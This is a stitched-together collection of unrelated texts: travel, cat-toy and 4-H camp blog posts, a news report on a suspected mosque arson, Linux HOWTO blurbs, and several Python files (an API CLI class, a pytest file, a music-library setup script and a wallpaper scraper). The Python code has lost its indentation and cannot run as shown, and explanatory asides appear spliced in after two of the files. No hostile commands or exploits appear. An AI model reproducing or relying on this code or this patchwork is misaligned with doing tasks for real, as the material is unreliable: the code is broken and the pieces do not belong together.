Even though it is all well and good to go and see the tourist destinations and monuments: don't stop there. Make a point to seek out the local places. When there are no tourists in sight and all you hear is the local language you are well on the right track. Some of the best restaurants, cafes, bars, etc. are the ones off the beaten path. It will also give you another chance to interact with the locals and see the way they live everyday life.
Of course pack your essentials, but don’t make the mistake of stuffing your bag full. Leave lots of room for souvenirs, new clothes and artisan items from local markets. You can always buy things once you’ve arrived.
If you have the chance to take a class that doesn’t really have anything to do with your major but will count as credits, do it! There is no better time to try something new. Take a language or history class about the culture you’re living in. I was a Psychology/Italian major at UW-Madison but in Florence I took a ceramics class with an amazing Italian artist for a teacher. It truly gave me an opportunity to broaden my interests and dabble in new things.
No, I don’t mean be antisocial. However, time abroad can be a great space for soul searching and getting to know yourself better. Take walks and go out to take pictures alone every once in a while. You’ll see things from a different angle.
In your own format, whether that be handwritten or electronic, you’ll be so glad later to have what you were feeling and experiencing in writing. Add as much detail as possible…even what you ate. Trust me, I’m so glad when I look back and can say “oh yeah, that pici pasta with cacio and pepe in Siena WAS so amazing.” It’s also a great way to reflect later on and see how you evolved throughout the time away.
Plan an extra side trip once your studies have concluded. I stayed in Europe 5 additional weeks to visit many different places (Palma de Majorca, Cologne, Amsterdam, Paris, Milan again and Rome). My parents even made the most of my study abroad, meeting me in Rome.
Five years ago to the day I was still gallivanting around Europe, yet the memories are crystal clear. Time away from home, your friends, and your family in a new culture can help you to discover who you are, giving you a new sense of freedom, fresh viewpoints, international friendships & most importantly: memories to last a lifetime. Following some of this advice, you will surely thrive and create your own personal and unique voyage. Buon viaggio!
|
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
import requests
import json
class EventGet(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.event_id = None
def add_arguments(self):
ApiCli.add_arguments(self)
self.parser.add_argument('-i', '--event-id', dest='event_id', action='store', required=True,
metavar='event_id', help='Event id of the event to fetch')
def get_arguments(self):
if self.args.event_id is not None:
self.event_id = self.args.event_id
self.path = "v1/events/{0}".format(self.event_id)
def get_description(self):
return "Gets a single event by id from a {0} account".format(self.product_name)
def _handle_results(self):
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
out = json.dumps(json.loads(self._api_result.text), sort_keys=True, indent=4, separators=(',', ': '))
print(self.colorize_json(out))
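The pretty-printing step in _handle_results — parsing the raw API text and re-serializing it with sorted keys and indentation — can be shown in isolation (sample payload is made up for illustration):

```python
# Standalone sketch of the formatting done in EventGet._handle_results:
# parse the response text, then re-serialize it sorted and indented.
import json

raw = '{"title": "CPU high", "id": "123"}'
out = json.dumps(json.loads(raw), sort_keys=True, indent=4,
                 separators=(',', ': '))
print(out)
# Keys come out alphabetically, one per indented line:
# {
#     "id": "123",
#     "title": "CPU high"
# }
```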
|
Merry Christmas to the Kitties!!
Hey There to all my fellow Crazy Cat Ladies!!!
Today’s post is dedicated to cool toys and accessories for your favorite cat(s)!
I have a little somethin’ somethin’ for everyone from kittens to seniors and price points from a bit high to extremely reasonable. Everything on this page is something my kids own and play with and have the Lolly and Buddy stamp of approval!
But if you have a feline of more discriminating tastes, here are a few things they may love!
The Thermo Kitty Bed is a WONDERFUL cat bed! It has a micro-fleece shell that the cats absolutely love and a heater element that fits inside the padded bottom. I’ve had this bed for almost 15 years. It’s survived five cats, hairballs, snarf and barfs, and too many rounds in the washing machine to count. The current owner of the bed is the many times Great Grandniece of my first Abyssinian.
The standard bed (pictured with my cats) comes in two sizes, small and large, and two color choices – cream/sage or cream/mocha. There is also a Deluxe Thermo-Kitty Bed with a zip-off hood for a more cavelike feeling. It comes in two sizes as well and two colors (mocha or tan) with pretty leopard spot micro-fleece material inside.
The best thing about this bed is its washability. The outside zips off so you can remove the foam core and throw the cover in the laundry. I’ve also washed the inside foam with no issues after one too many vomits.
The heating element has not needed replacement, the vinyl coating on it has no signs of age or wear. The K&H Thermo-kitty cat bed is virtually indestructible. The only reason I’m considering replacing my bed is that after 15 years, the sleeping pad at the bottom is getting a bit thin and worn and I’m hesitant at replacing materials close to the heating element myself.
This video is from almost a year ago, and Buddy STILL plays with it!
Close up video of the Butterfly Ball.
I’ve had too many bad experiences with regular collars or harnesses on cats. They’ve slipped out of them, gotten tangled in them, hung up in bushes, etc. I was at wit’s end what to do about something that I could use to take my cats to the vet easily. The Kitty Holster turned out to be a Godsend. As it turned out, my disabled brother got a huge kick out of leash training the cats, but he has terrible arthritis, so having something with velcro helped him get the cat dressed. These jackets also fit snugly, so the cat is soothed by being wrapped up in it, much like a thunder blanket works for a dog. They come in numerous patterns and four sizes to fit most cats. Krazy K Farm also does custom orders.
My two cats are very treat motivated. Their current favorite treats are Kitty Cravings by Blue Buffalo and Temptations. Blue Buffalo is also offering an adorable stocking stuffer package for their chicken treats for the Holiday season.
I know, cats view us as two-legged treat dispensers, but we can’t provide as much exercise as a Kong Cat Wobbler Treat Dispenser. Treat dispensers are a big hit in my household as long as they don’t give up their treats too readily. Well, they’re hits with me, Lolly would rather they just spew everything all at once. The Kong brand dispenser makes them work a little and provides a lot of play and exercise time.
From the tiniest kitten to our elder states-cats, the red dot is a perpetual winner!! This one is a handy take-anywhere keychain model … because you never know when you’ll find a cat who wants to play!
I love Kong products (in case you couldn’t tell), they are durable and long lasting. These refillable catnip toys are very durable, light, and lots of fun. Keep three or four fresh and filled in a Ziploc bag to bring out when boredom sets in.
There are hundreds of great programs and businesses out there who are selflessly dedicated to helping abandoned and feral cats. Instead of buying your kids more toys that they might never play with, please consider donating food or money to one of these wonderful programs. Please see my Instagram post with the same picture as above for a list of individuals and agencies who help cats on the street, in shelters, and in foster homes. They all have links in their profiles on how to help. Thank You!
Happy Holidays from my babies to yours!!
|
# encoding: utf-8
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import pytest
from mock import MagicMock
from jormungandr.parking_space_availability.car.star import StarProvider
from jormungandr.parking_space_availability.car.parking_places import ParkingPlaces
poi = {
'properties': {
'operator': 'Keolis Rennes',
'ref': '42'
},
'poi_type': {
'name': 'parking relais',
'id': 'poi_type:amenity:parking'
}
}
def car_park_space_availability_star_support_poi_test():
"""
STAR car provider support
"""
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
assert provider.support_poi(poi)
def car_park_space_get_information_test():
parking_places = ParkingPlaces(available=4,
occupied=3,
available_PRM=2,
occupied_PRM=0)
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3,
"nombreplacesdisponiblespmr": 2,
"nombreplacesoccupeespmr": 0
}
}
]
}
"""
import json
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == parking_places
invalid_poi = {}
assert provider.get_informations(invalid_poi) is None
provider._call_webservice = MagicMock(return_value=None)
assert provider.get_informations(poi) is None
star_response = """
{
"records":[
{
"fields": {
}
}
]
}
"""
empty_parking = ParkingPlaces(available=None,
occupied=None,
available_PRM=None,
occupied_PRM=None)
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
star_response = """
{
"records":[
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
# Information of PRM is not provided
parking_places = ParkingPlaces(available=4,
occupied=3)
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3
}
}
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
info = provider.get_informations(poi)
assert info == parking_places
assert not hasattr(info, "available_PRM")
assert not hasattr(info, "occupied_PRM")
|
Updated: Oct 2000. Intended to serve as a very brief introduction to the options available for using the Lego Group's Mindstorms Robotics Invention System (RIS) from within Linux. It also can be used as a gathering point for more information.
Updated: Aug 2007. Intended for anyone interested in installing and using IBM DB2® Express-C 9 database on Linux®.
|
#!/usr/bin/env python
import os, time
import sqlite3 as lite
import populatedb as pdb
class AmpycheApp():
def __init__(self):
ANSN = ('N', 'n', 'No', 'no')
ANSY = ('Y', 'y', 'Yes', 'yes')
self.ANSN = ANSN
self.ANSY = ANSY
self.pdb = pdb
def _get_selection(self):
print("""
\nWelcome to Ampyche. Please select the appropriate action.
1. Setup Ampyche.
2. Rescan/Add new music.
3. Setup Ampyche using an already existing
Ampache mysql database.
""")
selection = input("---> ")
return selection
def _get_music_path(self):
print("""
\nPlease enter the path to where the music files reside.
For example: /home/music: """)
m_path = input("---> ")
m_path = str(m_path)
return m_path
def _select_one(self, a_path):
gettags = pdb.Ampyche()
gettags = gettags.run(a_path)
def _select_two(self):
print("selection two")
#update = self.upd.UpdateDb()
#update = update._update()
##############################################################
## Start of MySQL stuff
def _get_hostname(self):
print("""
Please enter the Hostname of the MySql Database. """)
response = input("---> ")
return response
def _get_username(self):
print("""
Please enter the MySql Database Username. """)
response = input("---> ")
return response
def _get_password(self):
print("""
Please enter the MySql Database Password. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _get_dbname(self):
print("""
Please enter the MySql Database Name. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _select_three(self):
print("selection three")
# hostname = self._get_hostname()
# username = self._get_username()
# password = self._get_password()
# dbname = self._get_dbname()
#make db connection and generate static files.
#do more stuff here
def main(self):
selection = self._get_selection()
music_path = self._get_music_path()
if selection == '1':
make_it_so = self._select_one(music_path)
print("selection 1 complete")
if selection == '2':
make_it_so2 = self._select_two()
print("selection 2 complete")
if selection == '3':
print("this is selection three")
if __name__ == "__main__":
app = AmpycheApp()
app = app.main()
|
March 24 – Police are investigating a fire at a Southern California mosque on Sunday as a possible arson and hate crime after fresh graffiti on the driveway mentioned the mass shootings at two mosques in New Zealand, local media reported.
Police and firefighters were called to the Islamic Center of Escondido – north of San Diego – at about 3:15 a.m. (10:15 GMT) on Sunday about a fire that blackened an outside wall, The San Diego Tribune and other media reported.
Congregants at the center smelled smoke, spotted the fire and put it out before it caused serious damage before firefighters arrived, media reported.
But on the mosque's driveway, police found fresh graffiti that referenced the March 15 shootings at two mosques in Christchurch, New Zealand, that left 50 people dead and others seriously injured; the gunman had published a hate-filled manifesto on social media, police told the press.
Yusef Miller – a spokesman for the Islamic community in Escondido – told the Tribune that people at mosques across the region need to remain vigilant.
"Everyone is on edge," he told the paper. "When they connected it to New Zealand, it gave us more of a mortal fear that something outlandish might happen."
|
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import time
from sets import Set
import re
import os
import cookielib
# Construct request headers
agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36'
refer = 'http://interfacelift.com//wallpaper/7yz4ma1/04020_jetincarina_1440x900.jpg'
accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
uir = '1'
host = 'interfacelift.com'
connection = 'keep-alive'
pragma = 'no-cache'
acencode = 'gzip, deflate, sdch'
acln = 'en,zh-CN;q=0.8,zh;q=0.6'
headers = {
'User-Agent': agent
#'Referer':refer
}
# Use a session to persist login cookie information
session = requests.session()
def get_tags():
url = "https://interfacelift.com/wallpaper/tags/"
baseurl = "https://interfacelift.com"
tags = session.get(url).text.encode('utf-8')
tagsoup = BeautifulSoup(tags, 'html5lib')
cloud = tagsoup.select('.cloud', _candidate_generator=None, limit=None)
for item in cloud:
try:
links = item.select('a')
print len(links)
floder = 0
for link in links:
try:
taglink = link['href']
taglink = baseurl + taglink
tagname = link.next_element.encode('utf-8')
filepath = os.getcwd() + '/wallpaper/' + str(floder)
print taglink
print filepath
print os.path.exists(filepath)
if not os.path.exists(filepath):
os.mkdir(filepath)
floder += 1
linkend = 1
picinit = taglink + "index" + str(linkend) + ".html"
while download(picinit, filepath):
linkend += 1
picinit = taglink + "index" + \
str(linkend) + ".html"
else:
floder += 1
continue
except:
floder += 1
print "Download error"
except Exception, e:
print "An error occurred"
def download(picurl, path):
delchar = ['%2C', '%27']
if picurl:
unique = Set()
picpage = session.get(picurl).text
picsoup = BeautifulSoup(picpage.encode('utf-8'), 'html5lib')
divsoup = picsoup.select('a[href^="/wallpaper/details"]')
if divsoup:
try:
split = 0
for li in divsoup:
if split % 4 == 0:
baseurl = li['href'].split('/', -1)
id = int(baseurl[3])
subbase = baseurl[4].split('.', -1)
cleanbase = subbase[0].replace('_', '')
if '%2C' in cleanbase or '%27' in cleanbase:
cleanbase = cleanbase.replace('%2C', '')
cleanbase = cleanbase.replace('%27', '')
downloadurl = get_picurl(cleanbase, id, foo='1440x900')
print downloadurl, "--->", path
print cleanbase
get_file(downloadurl, cleanbase, path)
split += 1
return True
except:
print "获取链接失败"
return False
else:
return False
else:
return False
def get_picurl(base=None, id=None, foo='1440x900'):
baseurl = "http://interfacelift.com"
if base and id:
suburl = "/wallpaper/7yz4ma1/" + \
str(id) + '_' + base + '_' + foo + '.jpg'
picurl = baseurl + suburl
return picurl
def get_file(url, filename, path):
if url:
r = session.get(url, headers=headers)
# print r.text.encode('utf-8')
print filename
picname = path + "/" + filename + '.jpg'
with open(picname, 'wb') as f:
f.write(r.content)
print picname, "完成下载"
# f.close()
time.sleep(3)
# get_tags()
# get_file("http://interfacelift.com/wallpaper/7yz4ma1/01178_chicagoatnight_1440x900.jpg",'adas','.')
def test():
get_tags()
test()
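For reference, the download-URL pattern the script targets can be expressed as a small standalone helper. The `7yz4ma1` path segment is copied verbatim from the script above and may be session-specific on the live site; the zero-padded five-digit id matches the example URLs the script uses (a sketch, not a guaranteed site contract):

```python
def build_wallpaper_url(pic_id, slug, resolution="1440x900"):
    """Compose a direct .jpg URL from a numeric id, a cleaned slug,
    and a resolution string, matching the scheme the scraper assumes:
    http://interfacelift.com/wallpaper/7yz4ma1/<id>_<slug>_<res>.jpg
    """
    return ("http://interfacelift.com/wallpaper/7yz4ma1/"
            f"{pic_id:05d}_{slug}_{resolution}.jpg")

# e.g. id 4020, slug "jetincarina":
print(build_wallpaper_url(4020, "jetincarina"))
# -> http://interfacelift.com/wallpaper/7yz4ma1/04020_jetincarina_1440x900.jpg
```

Keeping the id zero-padded matters: casting `"04020"` through `int()` and back to `str()` silently drops the leading zero and produces a 404.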
I'm not an outdoors person. I don't like bugs. I don't like the heat. I'm not really into outdoors stuff. But I LOVE 4-H camp and the magic that happens when teens use their leadership skills to deliver the camp program!
For more than 20 years, I have been coordinating an overnight 4-H camp for grades 3-6, as well as day camps. My goal for the campers is that they are safe, have fun, make new friends and want to come back the following year. What motivates me to coordinate camps? It's the magic that happens when teenagers become camp counselors!
I strive to apply these principles within the training for camp counselors and then guide the teenagers to create this environment for younger campers.
4-H camp is an authentic opportunity for camp counselors to use their skills in real time. They learn skills and then apply them in the planning, implementation and evaluation of an actual camp. In Van Linden and Fertman’s book, “Youth Leadership: A Guide to Understanding Leadership Development in Adolescents”, they describe three stages of leadership development – awareness, interaction and mastery – which are sequential but fluid.
Awareness is when a young person realizes they have leadership skills and is capable of being a leader.
Interaction is about action. It’s testing possibilities, reaching limits, resting and reflecting.
Mastery involves having the energy, resources and guidance to pursue a personal vision.
When a young person comes to my camp counselor program, they are at the interaction stage. They believe they have the skills to be a camp counselor and are ready to interact and master. I model the youth development principles with the camp counselors as they learn, develop and implement a camp for younger members. They master these skills when they return the next year as camp counselors and take on more responsibility for different aspects of camp.
I may not like bugs and the outdoors, but I do love the mastery that teenage youth gain as 4-H camp counselors!
Thanks Kate! I have seen the notice for the new issues of the Journal for Youth Development. It's on my list to check out!
I'm with you - not a fan of camp but strongly believe in the positive experiences it provides for campers and youth leaders. I appreciated your point about mastery that happens when they return as counselors for a second year. Moving up the "ladder of leadership" is so important.
Thanks Becky! The camp counselor experience gives youth the confidence to utilize their skills in other parts of our program - State Ambassadors for example. And continue to "master" their leadership ability in all parts of their life.
I had such mixed experiences as a youth at camp. Being a camper was often a lonely and isolating experience. There were several camps I tried once and never returned to.
But later in my youth, I was scaffolded into camp leadership roles...junior counselor, counselor and camp director. It was there, as a leader, that I found my confidence, my joy and my power to create safe and meaningful experiences for others.
I love how much young people can grow at camp when they're given leadership roles. Even kids like me who were crummy campers can fall in love with camp and discover their ability to make a difference...when we lead.
Thanks for sharing, Erin. I'm glad you found your "place" at camp where you could grow and be empowered. I strive to train teenage youth about the positive impact they can have on campers, so that campers have a positive experience, not a lonely one like yours.
I listened to the podcast this week and was so intrigued with how Karyn was able to share so much more information in just 20 minutes! Thinking about the steps to prepare a young person for a more active leadership role is exciting as we as youth development professionals not only can help guide that process, but also witness it in action.